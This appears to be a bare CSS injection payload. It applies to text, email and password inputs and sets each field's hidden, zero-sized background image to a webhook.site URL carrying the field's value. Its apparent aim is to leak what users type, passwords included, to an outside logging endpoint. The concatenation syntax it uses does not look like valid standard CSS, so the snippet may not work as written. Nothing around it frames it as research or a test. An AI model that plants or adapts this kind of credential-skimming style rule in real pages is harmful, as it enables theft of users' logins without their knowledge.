input[type="text"], input[type="email"], input[type="password"] {
  background-image: url("https://webhook.site/ce55ddad-ae36-49d2-ad0c-6550d6e10bfd?input=" attr(value));
  background-repeat: no-repeat;
  background-size: 0px;
}
